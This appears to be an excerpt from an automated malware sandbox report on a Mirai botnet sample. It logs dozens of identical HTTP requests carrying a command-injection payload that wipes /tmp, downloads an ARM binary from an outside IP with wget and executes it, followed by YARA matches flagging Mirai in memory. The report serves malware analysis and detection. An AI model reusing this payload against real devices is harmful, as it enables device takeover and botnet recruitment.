    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
    Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 5228.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
    Source: 5223.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
    Source: 5225.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
    Source: 5226.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
    Source: 5227.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
    Source: LOAD without section mappingsProgram segment: 0x8048000